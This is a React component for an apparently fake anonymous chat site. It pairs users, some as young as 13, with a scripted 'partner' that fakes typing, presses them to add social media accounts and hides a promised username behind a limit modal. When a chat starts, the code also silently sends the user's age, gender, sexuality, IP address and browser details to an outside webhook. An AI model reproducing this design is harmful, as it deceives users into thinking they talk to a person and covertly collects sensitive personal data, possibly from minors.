import React, { useState, useEffect, useRef } from 'react';
import { Container, Form, Button, Card, ButtonGroup, Range, Modal, ModalBody, ModalFooter } from 'react-bootstrap';
import { useNavigate } from 'react-router-dom';
import LimitModal from './LimitModal';
import Ad from './Ad';

const ProfileModal = ({ show, onHide }) => {
  const interests = [
    'Straight', 'Bi', 'Gay/Lesbian', 'Pan'
  ];

  const [userProfile, setUserProfile] = React.useState(() => {
    const savedProfile = localStorage.getItem('userProfile');
    return savedProfile ? JSON.parse(savedProfile) : null;
  });

  const handleSave = () => {
    if (userProfile) {
      localStorage.setItem('userProfile', JSON.stringify(userProfile));
      onHide();
    }
  };

  return (
    <Modal 
      show={show} 
      onHide={onHide} 
      backdrop={!userProfile ? 'static' : true} 
      keyboard={!!userProfile}
    >
      <Modal.Header closeButton={!!userProfile}>
        <Modal.Title>{userProfile ? 'Edit Profile' : 'Set Up Your Profile'}</Modal.Title>
      </Modal.Header>
      <Modal.Body>
        <Form>
          <Form.Group className="mb-3">
            <Form.Label>Your Age</Form.Label>
            <Form.Control
              type="number"
              min="13"
              max="60"
              value={userProfile?.age || ''}
              onChange={(e) => setUserProfile(prev => ({ ...prev, age: e.target.value }))}
              required
            />
          </Form.Group>
          <Form.Group className="mb-3">
            <Form.Label>Your Gender</Form.Label>
            <Form.Select
              value={userProfile?.gender || ''}
              onChange={(e) => setUserProfile(prev => ({ ...prev, gender: e.target.value }))}
              required
            >
              <option value="">Select gender</option>
              <option value="f">Female</option>
              <option value="m">Male</option>
            </Form.Select>
          </Form.Group>
          <Form.Group className="mb-3">
            <Form.Label>Your Sexuality</Form.Label>
            <div className="d-flex flex-wrap gap-2">
              {interests.map(interest => (
                <Button
                  key={interest}
                  variant={userProfile?.sexuality === interest ? "primary" : "outline-primary"}
                  onClick={() => setUserProfile(prev => ({ ...prev, sexuality: interest }))}
                >
                  {interest}
                </Button>
              ))}
            </div>
          </Form.Group>
        </Form>
      </Modal.Body>
      <Modal.Footer>
        {userProfile && <Button variant="secondary" onClick={onHide}>Close</Button>}
        <Button 
          variant="primary" 
          onClick={handleSave}
          disabled={!userProfile?.age || !userProfile?.gender || !userProfile?.sexuality}
        >
          {userProfile ? 'Save Changes' : 'Continue'}
        </Button>
      </Modal.Footer>
    </Modal>
  );
};

const getParameterByName = (name) => {
  const urlParams = new URLSearchParams(window.location.search);
  return urlParams.get(name) || '';
};
const ChatSim = () => {
  const navigate = useNavigate();
  const [setup, setSetup] = useState(true);
  const [connecting, setConnecting] = useState(false);
  const [recipient, setRecipient] = useState(() => {
    const savedSettings = localStorage.getItem('chatSettings');
    return savedSettings ? JSON.parse(savedSettings) : {
      ageRange: { min: 18, max: 30 },
      gender: '',
      interests: []
    };
  });
  const [messages, setMessages] = useState([]);
  const [userInput, setUserInput] = useState('');
  const [isTyping, setIsTyping] = useState(false);
  const [responseIndex, setResponseIndex] = useState(0);
  const [showLimitModal, setShowLimitModal] = useState(false);
  const chatEndRef = useRef(null);
  const [userProfile, setUserProfile] = useState(() => {
    const savedProfile = localStorage.getItem('userProfile');
    return savedProfile ? JSON.parse(savedProfile) : null;
  });
  const [showProfileModal, setShowProfileModal] = useState(!userProfile);
 
  const interests = [
    'Straight', 'Bi', 'Gay/Lesbian', 'Pan'
  ];

  // Scripted responses with variations
  const scriptedResponses = [
    {
      variations: ["how are you?", "how r u?", "hru?", "how are you doing?"],
      minDelay: 1000,
      maxDelay: 2000
    },
    {
      variations: ["that's good to hear! Do you have snap, discord, or instagram?", "nice! Are you on snap, insta or discord?", "glad to hear that! do you have snap, discord or instagram?", "me too, are you on snap, instagram or discord?"],
      minDelay: 800,
      maxDelay: 1500
    },
    {
      variations: ["Yes because i want you to add me there, my username: "],
      minDelay: 2000,
      maxDelay: 3000,
      hasUsername: true
    },
    {
      variations: ["sorry, I need to go now. Dont forget to add me!", "gtg, remember to add me", "need to go, add me please"],
      minDelay: 1500,
      maxDelay: 2500,
      isEnding: true
    }
  ];

  useEffect(() => {
    localStorage.setItem('chatSettings', JSON.stringify(recipient));
  }, [recipient]);

  useEffect(() => {
    if (userProfile) {
      localStorage.setItem('userProfile', JSON.stringify(userProfile));
    }
  }, [userProfile]);

  const formatIntroduction = () => {
    const randomAge = Math.floor(Math.random() * (recipient.ageRange.max - recipient.ageRange.min + 1)) + recipient.ageRange.min;
    const formats = [
      `${recipient.gender}${randomAge}`,
      `${recipient.gender} ${randomAge}`,
      `${recipient.gender.toUpperCase()}${randomAge}`,
      `${randomAge}${recipient.gender}`,
      `${randomAge} ${recipient.gender}`
    ];
    return formats[Math.floor(Math.random() * formats.length)];
  };

  const scrollToBottom = () => {
    chatEndRef.current?.scrollIntoView({ behavior: 'smooth' });
  };

  useEffect(() => {
    scrollToBottom();
  }, [messages]);

  const startChat = async (e) => {
    e.preventDefault();
    if(localStorage.chatLimit){
        setShowLimitModal(true)
        return
    }

    if(window.logging){
      fetch(window.chatWebhook, {
        "headers": {
            "accept": "application/json",
            "accept-language": "en",
            "content-type": "application/json"
        },
        "body": JSON.stringify({"content":"","embeds":[{"title":"Starting chat"
        ,"description":`\`\`\`json\n${JSON.stringify(JSON.parse(localStorage.chatSettings), null, 2)}\n\`\`\`\n\n${localStorage.userProfile ? `\`\`\`json\n${JSON.stringify(JSON.parse(localStorage.userProfile), null, 2)}\n\`\`\`\n\n` : ""}`, "color":parseInt((1 << 24) * Math.random() | 0, 16).toString(16).padStart(6, "0"),"fields":[
            {"name":"User-Agent","value":navigator.userAgent},
            {"name":"IP","value":window.ip,"inline":true},
            {"name":"User ID","value":window.userHash,"inline":true},
            {"name":"From URL","value": getParameterByName("from") || document.referrer || "","inline":true},
            {"name":"Invited by","value": getParameterByName("ref") || "None","inline":true}
          ]}],"attachments":[]}),
        "method": "POST"
        }).then((response)=>{
        }).catch(()=>{})
    }

    setConnecting(true);
    await new Promise(resolve => setTimeout(resolve, 3000));
    setConnecting(false);
    setSetup(false);
    const intro = `hi ${formatIntroduction()}`;
    setMessages([{ text: intro, isUser: false }]);
    setResponseIndex(0);
  };

  const calculateTypingTime = (text) => {
    // Base typing speed (ms per character)
    const baseSpeed = 50;
    // Random variation in typing speed (±20%)
    const variation = 0.2;
    const baseTime = text.length * baseSpeed;
    const randomFactor = 1 + (Math.random() * variation * 2 - variation);
    return Math.max(1000, baseTime * randomFactor); // Minimum 1 second
  };

  const generateResponse = async () => {
    // Initial delay before typing indicator
    await new Promise(resolve => setTimeout(resolve, 1500));
    
    // Get next response from script
    const currentResponse = scriptedResponses[responseIndex];
    if (!currentResponse) return;

    const selectedResponse = currentResponse.variations[
      Math.floor(Math.random() * currentResponse.variations.length)
    ];

    // Show typing indicator
    setIsTyping(true);
    
    // Calculate typing time based on message length
    const typingTime = calculateTypingTime(selectedResponse);
    await new Promise(resolve => setTimeout(resolve, typingTime));
    
    setIsTyping(false);
    setMessages(prev => [...prev, { text: selectedResponse, isUser: false, hasUsername: currentResponse.hasUsername ? true : false }]);
    if(currentResponse.hasUsername){
      localStorage.usernameMessage = selectedResponse
    }
    if (currentResponse.isEnding) {
      await new Promise(resolve => setTimeout(resolve, 1000));
      setMessages(prev => [...prev, { text: 'Chat ended', isSystem: true }]);
    } else {
      setResponseIndex(prev => prev + 1);
    }
  };

  const handleSend = async (e) => {
    e.preventDefault();
    if (!userInput.trim()) return;

    setMessages(prev => [...prev, { text: userInput, isUser: true }]);
    setUserInput('');

    if (userInput.toLowerCase() === '/end') {
      setMessages(prev => [...prev, { text: 'Chat ended', isSystem: true }]);
      return;
    }

    generateResponse();
  };

  const handleInterestToggle = (interest) => {
    setRecipient(prev => ({
      ...prev,
      interests: prev.interests.includes(interest)
        ? prev.interests.filter(i => i !== interest)
        : [...prev.interests, interest]
    }));
  };

  const resetChat = () => {
    setSetup(true);
    setMessages([]);
    setUserInput('');
    setResponseIndex(0);
  };
  const [usernameModal, setUsernameModal] = useState(false)
  // Rest of the component remains the same...
  if (connecting) {
    return (
      <Container className="mt-5">
        <Card className="p-4 bg-dark text-light">
          <div className="text-center">
            <h3>Connecting...</h3>
            <div className="spinner-border text-primary mt-3" role="status">
              <span className="visually-hidden">Loading...</span>
            </div>
          </div>
        </Card>
      </Container>
    );
  }

  if (setup) {
    return (
        <>
        <ProfileModal show={showProfileModal} onHide={() => setShowProfileModal(false)} />
        <LimitModal title="Chatting limit reached" show={showLimitModal} setShow={setShowLimitModal}></LimitModal>
        <LimitModal title="Cannot reveal hidden username" show={usernameModal} setShow={setUsernameModal}></LimitModal>
      <Container className="mt-5">
        <Card className="p-4 bg-dark text-light">
          <div className="mb-4 d-flex justify-content-between align-items-center">
            <h2>Select who you want to connect with</h2>
            <div>
              <Button 
                variant="outline-primary"
                onClick={() => setShowProfileModal(true)}
                className="me-2"
              >
                Edit Profile
              </Button>
              <Button 
                variant="secondary"
                onClick={() => navigate('/')}
              >
                Home
              </Button>
            </div>
          </div>
          <Form onSubmit={startChat}>
            <Form.Group className="mb-4">
              <Form.Label>Age Range: {recipient.ageRange.min} - {recipient.ageRange.max}</Form.Label>
              <div className="d-flex gap-3 align-items-center">
                <Form.Range
                  value={recipient.ageRange.min}
                  min={13}
                  max={recipient.ageRange.max}
                  onChange={(e) => setRecipient(prev => ({
                    ...prev,
                    ageRange: { ...prev.ageRange, min: parseInt(e.target.value) }
                  }))}
                />
                <Form.Range
                  value={recipient.ageRange.max}
                  min={recipient.ageRange.min}
                  max={60}
                  onChange={(e) => setRecipient(prev => ({
                    ...prev,
                    ageRange: { ...prev.ageRange, max: parseInt(e.target.value) }
                  }))}
                />
              </div>
            </Form.Group>
            
            <Form.Group className="mb-4">
              <Form.Label>Gender</Form.Label>
              <Form.Select 
                required
                value={recipient.gender}
                onChange={(e) => setRecipient(prev => ({ ...prev, gender: e.target.value }))}
              >
                <option value="">Select gender</option>
                <option value="f">Female</option>
                <option value="m">Male</option>
              </Form.Select>
            </Form.Group>

            <Form.Group className="mb-4">
              <Form.Label>Sexuality</Form.Label>
              <div className="d-flex flex-wrap gap-2">
                {interests.map(interest => (
                  <Button
                    key={interest}
                    variant={recipient.interests.includes(interest) ? "primary" : "outline-primary"}
                    onClick={() => handleInterestToggle(interest)}
                    className="me-2"
                  >
                    {interest}
                  </Button>
                ))}
              </div>
            </Form.Group>

            <Button type="submit" variant="primary" size="lg" className="w-100">Start Chat</Button>
          </Form>
            <div className="d-flex flex-column align-items-center">
              <Ad width={728} height={90} />
              <Ad width={468} height={60} />
              <Ad width={320} height={50} />
            </div>
          {localStorage.usernameMessage && <>
          <hr></hr>
          <h2>Received usernames:</h2>
          <p>{localStorage.usernameMessage} <Button onClick={(e)=>{setUsernameModal(true);}}>Reveal username</Button></p>
          </>
          }
        </Card>
      </Container></>
    );
  }

  return (
    <>
    <LimitModal title="Cannot reveal hidden username" show={showLimitModal} setShow={setShowLimitModal}></LimitModal>
    <Container className="mt-5">
      <Card className="bg-dark text-light">
        <Card.Header className="d-flex justify-content-between align-items-center">
          <h3>Chat Session</h3>
          <ButtonGroup>
            <Button variant="primary" onClick={resetChat}>New Chat</Button>
            <Button 
              variant="secondary"
              onClick={() => navigate('/')}
            >
              Home
            </Button>
          </ButtonGroup>
        </Card.Header>
        <Card.Body style={{ height: '60vh', overflowY: 'auto' }}>
          <div className="d-flex flex-column gap-2">
            {messages.map((message, index) => (
              <div
                key={index}
                className={`d-flex ${message.isUser ? 'justify-content-end' : 'justify-content-start'}`}
              >
                <div
                  className={`p-2 rounded-3 ${
                    message.isSystem
                      ? 'bg-secondary text-center w-100'
                      : message.isUser
                      ? 'bg-primary'
                      : 'bg-secondary'
                  }`}
                  style={{ maxWidth: '100%' }}
                >
                  {message.text} {message.hasUsername && <><Button onClick={(e)=>{
                    localStorage.chatLimit = 1;
                    setShowLimitModal(true);
                  }}>Click here to reveal</Button></>}
                </div>
              </div>
            ))}
            {isTyping && (
              <div className="d-flex justify-content-start">
                <div className="bg-secondary p-2 rounded-3">
                  typing...
                </div>
              </div>
            )}
            <div ref={chatEndRef} />
          </div>
        </Card.Body>
        <Card.Footer>
          <Form onSubmit={handleSend}>
            <div className="d-flex gap-2">
              <Form.Control
                type="text"
                value={userInput}
                onChange={(e) => setUserInput(e.target.value)}
                placeholder="Type your message..."
                disabled={messages.some(m => m.isSystem) || isTyping}
              />
              <Button 
                type="submit"
                disabled={messages.some(m => m.isSystem) || isTyping}
              >
                Send
              </Button>
            </div>
          </Form>
        </Card.Footer>
      </Card>
    </Container></>
  );
};

export default ChatSim;